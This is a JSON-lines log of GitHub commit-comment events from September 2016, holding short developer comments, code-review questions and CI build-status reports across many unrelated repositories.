{"id":"4615054122","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19165719,"position":null,"line":null,"path":null,"commit_id":"a08c77f1b2c8b3bfbd17efede99daf6a02fc85d8","created_at":"2016-09-25T22:26:08Z","updated_at":"2016-09-25T22:26:08Z","body":"yez ill do when im finished reportingn a bug <3333"}},"created_at":"2016-09-25T22:26:08Z"}
{"id":"4615054939","type":"CommitCommentEvent","actor":{"login":"PanosSakkos"},"repo":{"name":"velikanov/SwiftPasscodeLock"},"payload":{"comment":{"id":19165721,"position":null,"line":null,"path":null,"commit_id":"ba70b2c6cb3cd87fe1a3743c5b7d0ec240dec943","created_at":"2016-09-25T22:26:44Z","updated_at":"2016-09-25T22:26:44Z","body":"Shouldn't the pod's minor version version be updated? 📦 "}},"created_at":"2016-09-25T22:26:44Z"}
{"id":"4615056503","type":"CommitCommentEvent","actor":{"login":"homebysix"},"repo":{"name":"eahrold/AHKeychain"},"payload":{"comment":{"id":19165726,"position":6,"line":68,"path":"AHKeychain/AHKeychain.m","commit_id":"5addf1ff8a173fbeab15264e6317bb599bf0b330","created_at":"2016-09-25T22:27:58Z","updated_at":"2016-09-25T22:27:58Z","body":"Is this identifier declared somewhere?"}},"created_at":"2016-09-25T22:27:58Z"}
{"id":"4615060467","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19165734,"position":null,"line":null,"path":null,"commit_id":"958ab074a177b453bbdb4c05fea74cc1f0567232","created_at":"2016-09-25T22:30:42Z","updated_at":"2016-09-25T22:30:42Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2318 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-958ab074a177b453bbdb4c05fea74cc1f0567232-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-958ab074a177b453bbdb4c05fea74cc1f0567232-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-25T22:30:42Z"}
{"id":"4615065748","type":"CommitCommentEvent","actor":{"login":"thomasjbradley"},"repo":{"name":"aaryllins/html-validation-fixes"},"payload":{"comment":{"id":19165738,"position":null,"line":null,"path":null,"commit_id":"98641fd3169f6bfdd72971879eebcb0cc84bff49","created_at":"2016-09-25T22:34:38Z","updated_at":"2016-09-25T22:34:38Z","body":"Are you signed in as exactly `aaryllins` into Markbot?"}},"created_at":"2016-09-25T22:34:38Z"}
{"id":"4615069165","type":"CommitCommentEvent","actor":{"login":"Mamatu"},"repo":{"name":"Mamatu/oap"},"payload":{"comment":{"id":19165743,"position":13,"line":28,"path":"ArnoldiPackage/ArnoldiProcedures.cpp","commit_id":"2eda0c1bec6603b7842959e646d6e7c8a2710a56","created_at":"2016-09-25T22:37:18Z","updated_at":"2016-09-25T22:37:18Z","body":"To remove in file version."}},"created_at":"2016-09-25T22:37:18Z"}
{"id":"4615069272","type":"CommitCommentEvent","actor":{"login":"devSparkle"},"repo":{"name":"CLIPStudents/OPOMUN"},"payload":{"comment":{"id":19165744,"position":null,"line":null,"path":null,"commit_id":"a53ad5ddb7863930a916bfa00ec3ececadbe50da","created_at":"2016-09-25T22:37:22Z","updated_at":"2016-09-25T22:37:22Z","body":"100th commit! :tada:"}},"created_at":"2016-09-25T22:37:22Z"}
{"id":"4615073288","type":"CommitCommentEvent","actor":{"login":"gsherwood"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19165748,"position":26,"line":550,"path":"CodeSniffer.php","commit_id":"3df85dcb433e4dbc82a435554f717ca5958fd668","created_at":"2016-09-25T22:40:34Z","updated_at":"2016-09-25T22:40:34Z","body":"@jrfnl Sorry, I made this assumption here because I didn't think any unit tests would run without specifying a single sniff. The problem this fixes is due to the fact that an entire standard is included, which isn't how the tests should have been run.\r\n\r\nIt's an easy fix so I'll add it, but I'm keen to know what sort of tests you have that caused this problem. More out of interest, but also so I don't break more stuff in the future."}},"created_at":"2016-09-25T22:40:34Z"}
{"id":"4615074174","type":"CommitCommentEvent","actor":{"login":"tkdberger"},"repo":{"name":"tkdberger/screeps-scripting"},"payload":{"comment":{"id":19165751,"position":null,"line":null,"path":null,"commit_id":"1c88e91d72b1a1819b5953149ff0932cc2fce874","created_at":"2016-09-25T22:41:12Z","updated_at":"2016-09-25T22:41:12Z","body":"Well, GPG signing works. Good to know."}},"created_at":"2016-09-25T22:41:12Z"}
{"id":"4615074924","type":"CommitCommentEvent","actor":{"login":"Konfekt"},"repo":{"name":"wikimatze/vimfiles"},"payload":{"comment":{"id":19165753,"position":null,"line":null,"path":null,"commit_id":"a3bfbd91d2e0ff698f892774ff3b5024135de01c","created_at":"2016-09-25T22:41:47Z","updated_at":"2016-09-25T22:41:47Z","body":"Oi Matthias, könntest Du einen Blick auf \r\n\r\nhttps://gist.github.com/Konfekt/8adc5bd38659563e14aa6588236c7be6\r\n\r\nwerfen? Das sollte, ausgebaut, der Vortrag im Juni werden. Ergibt's Sinn?"}},"created_at":"2016-09-25T22:41:47Z"}
{"id":"4615075650","type":"CommitCommentEvent","actor":{"login":"Ivkoto"},"repo":{"name":"Ivkoto/ExercicesGithub"},"payload":{"comment":{"id":19165756,"position":null,"line":null,"path":null,"commit_id":"9470cbc9507630f39a6a1634829be188ea943420","created_at":"2016-09-25T22:42:24Z","updated_at":"2016-09-25T22:42:24Z","body":"Looks good."}},"created_at":"2016-09-25T22:42:24Z"}
{"id":"4615076948","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19165761,"position":6,"line":213,"path":"src/plugins/ble.ts","commit_id":"79f0a3fc7b34aeba6ad319b3990ff9027732652b","created_at":"2016-09-25T22:43:17Z","updated_at":"2016-09-25T22:43:17Z","body":"Missing returns"}},"created_at":"2016-09-25T22:43:17Z"}
{"id":"4615078695","type":"CommitCommentEvent","actor":{"login":"Nexela"},"repo":{"name":"pyanodon/pYCoalprocesing"},"payload":{"comment":{"id":19165763,"position":5,"line":16,"path":"prototypes/fluids/dirty-water.lua","commit_id":"d61695371022427092da1e1c90b903a0e8aae1e7","created_at":"2016-09-25T22:44:32Z","updated_at":"2016-09-25T22:44:32Z","body":"Things to think about, This should possibly be left higher and increase the liquid of the tailings_pond to compensate.   If this is set too low players will possibly use storage tanks over the tailings ponds.\r\n\r\nAlso what do you think about Tailings ponds draining slowly over time also?  Drain would be slower then input so the \"pollution\" trigger would still happen."}},"created_at":"2016-09-25T22:44:32Z"}
{"id":"4615079089","type":"CommitCommentEvent","actor":{"login":"ihadeed"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19165764,"position":6,"line":213,"path":"src/plugins/ble.ts","commit_id":"79f0a3fc7b34aeba6ad319b3990ff9027732652b","created_at":"2016-09-25T22:44:52Z","updated_at":"2016-09-25T22:44:52Z","body":"@ramonornela thanks I just added it"}},"created_at":"2016-09-25T22:44:52Z"}
{"id":"4615080633","type":"CommitCommentEvent","actor":{"login":"xxgreg"},"repo":{"name":"xxgreg/dart_postgresql"},"payload":{"comment":{"id":19165769,"position":null,"line":null,"path":null,"commit_id":"faeeb3dd3e17a6ef34e7ef6a6b465c565cc2234c","created_at":"2016-09-25T22:45:55Z","updated_at":"2016-09-25T22:45:55Z","body":"Ok - merged and pushed. But with minimal testing.\r\n\r\nThanks for your help, and patience. I am far to busy at the moment."}},"created_at":"2016-09-25T22:45:55Z"}
{"id":"4615080794","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19165770,"position":null,"line":null,"path":null,"commit_id":"e5f9183eedf598197dd6bd84568e021893a8eb5f","created_at":"2016-09-25T22:46:03Z","updated_at":"2016-09-25T22:46:03Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2281 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5f9183eedf598197dd6bd84568e021893a8eb5f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5f9183eedf598197dd6bd84568e021893a8eb5f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-91.35%25-yellow.svg)</a> \n"}},"created_at":"2016-09-25T22:46:03Z"}
{"id":"4615080916","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19165771,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-25T22:46:08Z","updated_at":"2016-09-25T22:46:08Z","body":"interesting... i downloaded\ngtkhtml-browser-2015-05-15.tar.bz2\nlibgtkhtml-2.12.tar.bz2\n\nbut i'm not able to test it at the moment.. the pc frozed midway\ncompiling, it happened 2 times. then i fell asleep. i see in precise\nthere is \"surfer\".. a tiny html viewer that does not support browsing\nand cannot handle /usr/share/doc/index.html .. this file has about\n17000 lines. however dillo does the job really fast. i spotted a bug\nin indexgen.sh when i noticed it did not produce the heavy page\n(index.html), i just fixed it. i see javascript at the beginning of\nthe file.\n\nso the defaulthtmlviewer/basichtmlviewer by default will be dillo.. of\ncourse this is in woof, usually this values are overriden/changed.\n"}},"created_at":"2016-09-25T22:46:08Z"}
{"id":"4615081295","type":"CommitCommentEvent","actor":{"login":"gitiak"},"repo":{"name":"gitiak/helloworld"},"payload":{"comment":{"id":19165772,"position":null,"line":null,"path":null,"commit_id":"1f2ac8e5e68810a077ac848366cf8a2588fa6d0d","created_at":"2016-09-25T22:46:27Z","updated_at":"2016-09-25T22:46:27Z","body":"I love the new code"}},"created_at":"2016-09-25T22:46:27Z"}
{"id":"4615087012","type":"CommitCommentEvent","actor":{"login":"chriso"},"repo":{"name":"chriso/redback"},"payload":{"comment":{"id":19165789,"position":5,"line":8,"path":"package.json","commit_id":"2b70cd62a0afab2df4530c0a50790edd6bef14ef","created_at":"2016-09-25T22:51:03Z","updated_at":"2016-09-25T22:51:03Z","body":"Thanks: 88741df5c8d1279e26176edd997c0d2bc506fb86"}},"created_at":"2016-09-25T22:51:03Z"}
{"id":"4615087858","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19165794,"position":null,"line":null,"path":null,"commit_id":"e5f9183eedf598197dd6bd84568e021893a8eb5f","created_at":"2016-09-25T22:51:40Z","updated_at":"2016-09-25T22:51:40Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5f9183eedf598197dd6bd84568e021893a8eb5f-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-25T22:51:40Z"}
{"id":"4615088295","type":"CommitCommentEvent","actor":{"login":"girlsam"},"repo":{"name":"tyguy310/sports-league-manager"},"payload":{"comment":{"id":19165796,"position":1,"line":7,"path":"src/server/db/migrations/20160923145558_teams.js","commit_id":"88f3bdc004a64a022d100604b603ca4897f5c3a4","created_at":"2016-09-25T22:52:01Z","updated_at":"2016-09-25T22:52:01Z","body":"Do we want zip to be unique? Could have multiple teams in the same zip code"}},"created_at":"2016-09-25T22:52:01Z"}
{"id":"4615089444","type":"CommitCommentEvent","actor":{"login":"MattWAnderson"},"repo":{"name":"SleepSpace9/Nemisys"},"payload":{"comment":{"id":19165798,"position":null,"line":null,"path":null,"commit_id":"701e7d1683288f1b689bffb20b92ab624f63cd9d","created_at":"2016-09-25T22:52:58Z","updated_at":"2016-09-25T22:52:58Z","body":"Oddly it did not compile for me due to line 84, however I did not care to have that in the console logs anyways and just removed it.  Working so far - Thanks!"}},"created_at":"2016-09-25T22:52:58Z"}
{"id":"4615090219","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19165800,"position":null,"line":null,"path":null,"commit_id":"49bf9b7cc5a664e2bcfb232bbacaf7f8f418b90e","created_at":"2016-09-25T22:53:32Z","updated_at":"2016-09-25T22:53:32Z","body":"Thanks ;)"}},"created_at":"2016-09-25T22:53:32Z"}
{"id":"4615091264","type":"CommitCommentEvent","actor":{"login":"kann23"},"repo":{"name":"cburd87/Stockfish"},"payload":{"comment":{"id":19165804,"position":null,"line":null,"path":null,"commit_id":"28593ffb339cef7baba476d8463e8b80681701c0","created_at":"2016-09-25T22:54:19Z","updated_at":"2016-09-25T22:54:19Z","body":"Thanks so much!  I'm sorry I didn't see your previous message.  Is there any way to stop the current run that is in progress?"}},"created_at":"2016-09-25T22:54:19Z"}
{"id":"4615091430","type":"CommitCommentEvent","actor":{"login":"girlsam"},"repo":{"name":"tyguy310/sports-league-manager"},"payload":{"comment":{"id":19165805,"position":1,"line":7,"path":"src/server/db/migrations/20160923145558_teams.js","commit_id":"88f3bdc004a64a022d100604b603ca4897f5c3a4","created_at":"2016-09-25T22:54:25Z","updated_at":"2016-09-25T22:54:25Z","body":"What's the difference between teams and leagues (and sports)"}},"created_at":"2016-09-25T22:54:25Z"}
{"id":"4615094182","type":"CommitCommentEvent","actor":{"login":"lordofhyphens"},"repo":{"name":"prusa3d/Slic3r"},"payload":{"comment":{"id":19165811,"position":null,"line":null,"path":null,"commit_id":"565146d9d1be222693901a26acb5a3c65dd8ac65","created_at":"2016-09-25T22:56:30Z","updated_at":"2016-09-25T22:56:30Z","body":"Is there a test case for this somewhere? Trying to keep track of the whys of changing things as well as the hows."}},"created_at":"2016-09-25T22:56:30Z"}
{"id":"4615095484","type":"CommitCommentEvent","actor":{"login":"ajjl"},"repo":{"name":"ajjl/compiler"},"payload":{"comment":{"id":19165813,"position":5,"line":5,"path":"Testing/DansTest.cpp","commit_id":"a45f4f8e776c22f473a38cecb495576305bf2d3c","created_at":"2016-09-25T22:57:29Z","updated_at":"2016-09-25T22:57:29Z","body":"@Giesch you remebered this and im pointing it out because im mean"}},"created_at":"2016-09-25T22:57:29Z"}
{"id":"4615096294","type":"CommitCommentEvent","actor":{"login":"davisagli"},"repo":{"name":"tomgross/training"},"payload":{"comment":{"id":19165815,"position":45,"line":235,"path":"solr-training/advanced-topics.rst","commit_id":"929eb9f07449115f044ee900694267cfe296f7e1","created_at":"2016-09-25T22:58:06Z","updated_at":"2016-09-25T22:58:06Z","body":"I personally disagree on this point. If I'm building queries programmatically I'd rather do it using something inherently structured, rather than a text-based DSL where I need to worry about escaping."}},"created_at":"2016-09-25T22:58:06Z"}
{"id":"4615096311","type":"CommitCommentEvent","actor":{"login":"romanlukichev"},"repo":{"name":"romanlukichev/InsertionSort"},"payload":{"comment":{"id":19165816,"position":null,"line":null,"path":null,"commit_id":"3fe34cf2c41083632ce78c4eb9bff3d9eeb99703","created_at":"2016-09-25T22:58:07Z","updated_at":"2016-09-25T22:58:07Z","body":"![screen_2016-09-25 15 52 46](https://cloud.githubusercontent.com/assets/18017741/18818823/d4f50fe6-8338-11e6-8e7d-9cecbe304bf2.jpg)\r\n"}},"created_at":"2016-09-25T22:58:07Z"}
{"id":"4615097361","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19165819,"position":null,"line":null,"path":null,"commit_id":"bac76b4d3ab48d9830a76235792e02011e28259b","created_at":"2016-09-25T22:58:55Z","updated_at":"2016-09-25T22:58:55Z","body":"Quest progress bar - lines up with the box, on my system.\r\n8796 \tlist:ItemSet(2, format(\" |TInterface\\\\Addons\\\\Carbonite\\\\Gfx\\\\Skin\\\\InfoBarBG:12:100|t|TInterface\\\\Addons\\\\Carbonite\\\\Gfx\\\\Skin\\\\InfoBarB:12:%d:-169|t %.2f%%\", math.floor(percent), percent))\r\n\r\n8830 list:ItemSet(2, format(\" |TInterface\\\\Addons\\\\Carbonite\\\\Gfx\\\\Skin\\\\InfoBarBG:12:100|t|TInterface\\\\Addons\\\\Carbonite\\\\Gfx\\\\Skin\\\\InfoBarB:12:%d:-169|t %.2f%%\", math.floor(percent), percent))\r\n\r\nin nxquest.lua  \r\n\r\nI can not add to the project here, and the number may be resolution dependent, but it works for mine."}},"created_at":"2016-09-25T22:58:55Z"}
{"id":"4615098134","type":"CommitCommentEvent","actor":{"login":"mikhaelmurmur"},"repo":{"name":"mikhaelmurmur/PseudoRandomGenerators"},"payload":{"comment":{"id":19165821,"position":9,"line":9,"path":"PseudoRandomGenerators/PseudoRandomGenerators/IGeneratorBase.h","commit_id":"d1697ba00f90408a2e4346230cb329d90a4ed0f8","created_at":"2016-09-25T22:59:30Z","updated_at":"2016-09-25T22:59:30Z","body":"миша хуй"}},"created_at":"2016-09-25T22:59:30Z"}
{"id":"4615098138","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"cburd87/Stockfish"},"payload":{"comment":{"id":19165822,"position":null,"line":null,"path":null,"commit_id":"28593ffb339cef7baba476d8463e8b80681701c0","created_at":"2016-09-25T22:59:31Z","updated_at":"2016-09-25T22:59:31Z","body":"Click on the stop button in the following screen\r\nhttp://tests.stockfishchess.org/tests/view/57e8315b0ebc59763f358e80"}},"created_at":"2016-09-25T22:59:31Z"}
{"id":"4615100832","type":"CommitCommentEvent","actor":{"login":"claudiopro"},"repo":{"name":"markdalgleish/react-static-site-playground"},"payload":{"comment":{"id":19165829,"position":10,"line":12,"path":"src/index.js","commit_id":"7ed3de414605a432f9994fa4503bdd32bb5d0ce7","created_at":"2016-09-25T23:01:14Z","updated_at":"2016-09-25T23:01:14Z","body":"Why aliased as `StoreProvider`? Is it to qualify providers like `RoutesProvider`?"}},"created_at":"2016-09-25T23:01:14Z"}
{"id":"4615101179","type":"CommitCommentEvent","actor":{"login":"ajjl"},"repo":{"name":"ajjl/compiler"},"payload":{"comment":{"id":19165831,"position":5,"line":39,"path":"Testing/CMakeLists.txt","commit_id":"9a7017dddd59cf06ce96a2f49706af3e36a88ef5","created_at":"2016-09-25T23:01:27Z","updated_at":"2016-09-25T23:01:27Z","body":"@hongxli We accidentilly deleted this when we did svn merge @Giesch "}},"created_at":"2016-09-25T23:01:27Z"}
{"id":"4615102304","type":"CommitCommentEvent","actor":{"login":"kashike"},"repo":{"name":"PaperMC/Paperclip"},"payload":{"comment":{"id":19165835,"position":237,"line":237,"path":"src/main/java/com/destroystokyo/paperclip/Paperclip.java","commit_id":"ed3a1bf3e4e416939b5e3c9e770536a7e7bd0786","created_at":"2016-09-25T23:02:17Z","updated_at":"2016-09-25T23:02:17Z","body":"![x](http://i0.kym-cdn.com/photos/images/facebook/000/993/875/084.png)"}},"created_at":"2016-09-25T23:02:17Z"}
{"id":"4615102877","type":"CommitCommentEvent","actor":{"login":"markdalgleish"},"repo":{"name":"markdalgleish/react-static-site-playground"},"payload":{"comment":{"id":19165838,"position":10,"line":12,"path":"src/index.js","commit_id":"7ed3de414605a432f9994fa4503bdd32bb5d0ce7","created_at":"2016-09-25T23:02:40Z","updated_at":"2016-09-25T23:02:40Z","body":"Exactly. Now that the app has multiple provider components, I felt this was necessary."}},"created_at":"2016-09-25T23:02:40Z"}
{"id":"4615108084","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19165852,"position":null,"line":null,"path":null,"commit_id":"a08c77f1b2c8b3bfbd17efede99daf6a02fc85d8","created_at":"2016-09-25T23:06:09Z","updated_at":"2016-09-25T23:06:09Z","body":"@SalmonGER Done. Should plugin.yml be german or english though?"}},"created_at":"2016-09-25T23:06:09Z"}
{"id":"4615109130","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19165856,"position":null,"line":null,"path":null,"commit_id":"46a4fe124464a21eeafc1181e4222c749392c81c","created_at":"2016-09-25T23:06:54Z","updated_at":"2016-09-25T23:06:54Z","body":"The issue is with perfectionist... I opened https://github.com/ben-eb/perfectionist/issues/43."}},"created_at":"2016-09-25T23:06:54Z"}
{"id":"4615109176","type":"CommitCommentEvent","actor":{"login":"git-matt"},"repo":{"name":"simpleinvoices/simpleinvoices"},"payload":{"comment":{"id":19165857,"position":null,"line":null,"path":null,"commit_id":"d163cd9e7eee6abf2d7774e84af45b3d357d5c10","created_at":"2016-09-25T23:06:56Z","updated_at":"2016-09-25T23:06:56Z","body":"Hi\nYes I understand.  This was a quick and dirty method, cause so far only 'matts_luxury_pack' has changes to the auth.  But that won't work in all cases.  I am happy and open to better solutions, provide code if possible.\n\n\n\n\t\t_____________________________\nFrom: Ap.Muthu <notifications@github.com>\nSent: Saturday, September 24, 2016 10:36 PM\nSubject: Re: [simpleinvoices/simpleinvoices] ordered classes better (d163cd9)\nTo: simpleinvoices/simpleinvoices <simpleinvoices@noreply.github.com>\nCc: git-matt <matt.scott@sohnetwork.com>, Author <author@noreply.github.com>\n\n\n\n\nYour changes to include/include_auth.php will result in only the first extension in the array having the said file to be included. A daisy chain of all auth may be preferable or some priority in the auth be leveraged possibly set in the config file.\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread.    \n\n\n\t"}},"created_at":"2016-09-25T23:06:56Z"}
{"id":"4615111491","type":"CommitCommentEvent","actor":{"login":"jart"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19165867,"position":null,"line":null,"path":null,"commit_id":"65038b084059cf934df50fa86dba5b0e765f9d65","created_at":"2016-09-25T23:08:35Z","updated_at":"2016-09-25T23:08:35Z","body":"It seems like somehow a change in this commit got reverted which caused the download script to break. We're looking into it."}},"created_at":"2016-09-25T23:08:35Z"}
{"id":"4615111624","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19165869,"position":null,"line":null,"path":null,"commit_id":"e5f9183eedf598197dd6bd84568e021893a8eb5f","created_at":"2016-09-25T23:08:43Z","updated_at":"2016-09-25T23:08:43Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2301 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5f9183eedf598197dd6bd84568e021893a8eb5f-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5f9183eedf598197dd6bd84568e021893a8eb5f-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.15%25-yellow.svg)</a> \n"}},"created_at":"2016-09-25T23:08:43Z"}
{"id":"4615114253","type":"CommitCommentEvent","actor":{"login":"tripplab"},"repo":{"name":"tripplab/HTMoLv3"},"payload":{"comment":{"id":19165881,"position":null,"line":null,"path":null,"commit_id":"e281f3fc82b5ebd3dc123e37235f5158a64b9f86","created_at":"2016-09-25T23:10:42Z","updated_at":"2016-09-25T23:10:42Z","body":"Commit de Emanuel"}},"created_at":"2016-09-25T23:10:42Z"}
{"id":"4615114380","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19165882,"position":null,"line":null,"path":null,"commit_id":"f36411e67dd7c622ec54bcee08dee6256dc2c2d4","created_at":"2016-09-25T23:10:47Z","updated_at":"2016-09-25T23:10:47Z","body":"\nBuild report #162650239 for sha f36411e67dd7c622ec54bcee08dee6256dc2c2d4:\n\n[![UnitTests](https://img.shields.io/badge/unittests-failed%20%281/4%29%20-red.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-16.14%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3760%20/%2010051%20%2837.41%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-36.91%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-25T23:10:47Z"}
{"id":"4615120746","type":"CommitCommentEvent","actor":{"login":"ivandrofly"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19165911,"position":17,"line":17,"path":"libse/SubtitleFormats/PhoenixSubtitle.cs","commit_id":"c1188fefc0387b829d6419028e333f6d7be15d63","created_at":"2016-09-25T23:15:30Z","updated_at":"2016-09-25T23:15:30Z","body":"At the moment none of Subtitle Edit's support subtitle formats seems to have same formatting style as Phoenix, so I think we can safely do ignore white-spaces in Regex."}},"created_at":"2016-09-25T23:15:30Z"}
{"id":"4615121097","type":"CommitCommentEvent","actor":{"login":"jewsycouture"},"repo":{"name":"3dshax/ctr"},"payload":{"comment":{"id":19165913,"position":null,"line":null,"path":null,"commit_id":"bcb3734b9a26d0fe7ef66f7d3814406fee797303","created_at":"2016-09-25T23:15:46Z","updated_at":"2016-09-25T23:15:46Z","body":"#: 12422 04795\r\nDate 9/25/2016\r\nEmail: jew.sy3@gmail.com"}},"created_at":"2016-09-25T23:15:46Z"}
{"id":"4615122478","type":"CommitCommentEvent","actor":{"login":"jewsycouture"},"repo":{"name":"3dshax/ctr"},"payload":{"comment":{"id":19165919,"position":null,"line":null,"path":null,"commit_id":"bcb3734b9a26d0fe7ef66f7d3814406fee797303","created_at":"2016-09-25T23:16:44Z","updated_at":"2016-09-25T23:16:44Z","body":" Time 19:16"}},"created_at":"2016-09-25T23:16:44Z"}
{"id":"4615122928","type":"CommitCommentEvent","actor":{"login":"tchiwam"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":19165921,"position":null,"line":null,"path":null,"commit_id":"eabff30e75429fe1db715c46c123fde678e689e6","created_at":"2016-09-25T23:17:04Z","updated_at":"2016-09-25T23:17:04Z","body":"Thank you for the feature. It does work a lot better with my CoreXY with external stepper driver on a Rumba board."}},"created_at":"2016-09-25T23:17:04Z"}
{"id":"4615123921","type":"CommitCommentEvent","actor":{"login":"CryptoCoderz"},"repo":{"name":"CryptoCoderz/Espers"},"payload":{"comment":{"id":19165923,"position":null,"line":null,"path":null,"commit_id":"2f2458b10ee12bdbddbf95a2d4e6eb3bb6c5c4f5","created_at":"2016-09-25T23:17:48Z","updated_at":"2016-09-25T23:17:48Z","body":"Currently this is a Windows only feature with the new launcher to interact between client and launcher. Later on it will simply be reading from and writing to one configuration file and it will be adapted to Linux and Mac."}},"created_at":"2016-09-25T23:17:48Z"}
{"id":"4615126152","type":"CommitCommentEvent","actor":{"login":"elnjensen"},"repo":{"name":"openaps/oref0"},"payload":{"comment":{"id":19165931,"position":null,"line":null,"path":null,"commit_id":"3f4c205cb5e88c59d229994cfe9c52e1871cf5da","created_at":"2016-09-25T23:19:29Z","updated_at":"2016-09-25T23:19:29Z","body":"Confirmed!  Looks good to me. "}},"created_at":"2016-09-25T23:19:29Z"}
{"id":"4615127712","type":"CommitCommentEvent","actor":{"login":"chrisxdss10"},"repo":{"name":"chrisxdss10/Prueba1"},"payload":{"comment":{"id":19165934,"position":4,"line":9,"path":"hola.html","commit_id":"3319516b6315e1ccb411de4eda28eaf4c48b6656","created_at":"2016-09-25T23:20:37Z","updated_at":"2016-09-25T23:20:37Z","body":"<p>jejeje</p>"}},"created_at":"2016-09-25T23:20:37Z"}
{"id":"4615128301","type":"CommitCommentEvent","actor":{"login":"steveconners"},"repo":{"name":"OpenTechStrategies/coeci-cms-mpsp"},"payload":{"comment":{"id":19165935,"position":null,"line":null,"path":null,"commit_id":"c997ff344b3bedc78ff085bff06159818e7ae922","created_at":"2016-09-25T23:21:03Z","updated_at":"2016-09-25T23:21:03Z","body":"Also includes DATALOADER-CHANGES.sql"}},"created_at":"2016-09-25T23:21:03Z"}
{"id":"4615128928","type":"CommitCommentEvent","actor":{"login":"andrewarrow"},"repo":{"name":"andrewarrow/paradise_ftp"},"payload":{"comment":{"id":19165938,"position":null,"line":null,"path":null,"commit_id":"93f9ce78463f8f77220506019b5b761580a5e607","created_at":"2016-09-25T23:21:31Z","updated_at":"2016-09-25T23:21:31Z","body":"we only read the 1st 512 bytes and run that thru mime type checker because if the binary data is not a specific mime type we are looking for, we want to tell the user right away and not waste any more time uploading the bytes."}},"created_at":"2016-09-25T23:21:31Z"}
{"id":"4615131596","type":"CommitCommentEvent","actor":{"login":"dougmoscrop"},"repo":{"name":"Nordstrom/serverless"},"payload":{"comment":{"id":19165942,"position":null,"line":null,"path":null,"commit_id":"2f99b332a6bc5c05f0ad0e738bb497e15e4263b7","created_at":"2016-09-25T23:23:34Z","updated_at":"2016-09-25T23:23:34Z","body":"My bad,. I did not look at the latest commit reference that led me here."}},"created_at":"2016-09-25T23:23:34Z"}
